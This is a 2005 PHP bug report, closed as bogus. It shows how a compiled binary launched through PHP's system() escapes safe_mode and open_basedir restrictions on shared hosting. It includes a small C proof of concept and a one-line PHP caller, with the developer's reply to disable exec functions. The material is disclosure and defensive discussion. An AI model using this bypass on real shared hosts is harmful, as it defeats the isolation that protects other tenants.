#32421 [Bgs]: Execution functions bypass safe_mode configurations

[ricardi at gmail dot com]

 ID:               32421
 User updated by:  ricardi at gmail dot com
 Reported By:      ricardi at gmail dot com
 Status:           Bogus
 Bug Type:         Program Execution
 Operating System: *nix (Tested on Linux)
 PHP Version:      4.3.10
 New Comment:

The PHP engine can't not control de children created by the exec
functions? This could be a great security enhancement, since that some
php applications are suffering from xploits that use this technic. I've
already disable this functions now, but our clients are unhappy with
this limitations.


Previous Comments:
------------------------------------------------------------------------

[2005-03-23 08:23:53] [EMAIL PROTECTED]

Disable system() and other exec functions then.
PHP is unable to prevent you to shoot your leg or to format harddrive
with a binary called by a binary.

------------------------------------------------------------------------

[2005-03-23 01:10:23] ricardi at gmail dot com

Description:
------------
We bypass the safe_mode restrictions using binary with "system"
function built-in. The problem occurs when we had an incident in a mass
virtualhost machine. One of the domains, execute a script that bypass
the safe_mode restrictions like open_base_dir and safe_mode_exec_dir. 

The configurations in the virtualhost was like:

<VirtualHost *>
ServerName www.something.com
ServerPath /mnt/nfs/domains/something.com.br/www
php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_include_dir
/mnt/nfs/domains/something.com.br/
php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
...

</VirtualHost>

We create a simple program in "C" that create a file outside the
open_basedir and execute a binary that isn't in the
safe_mode_exec_dir:
/* ---------------
Contents of file.c 
 ---------------- */

#include <stdio.h>

int main() {
        system("find / -maxdepth 1 > /tmp/trash.txt");
        return 0;
}

Compiling: gcc -o file file.c

With an ftp access, we put the file in the safe_mode_exec_dir:

> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x    1 nfsnobod nfsnobod    13576 Mar 22 16:57 file

Now create a php script that calls the binary.

<?php
system("file");
?>

Then put this on the webroot and after accessing the script with
http://www.something.com.br/script.php, check the /tmp:

> ls -la /tmp
-rw-r--r--    1 nfsnobody     nfsnobody          139 Mar 22 21:00
trash.txt

We had to disable the execution feature from our product. 



------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=32421&edit=1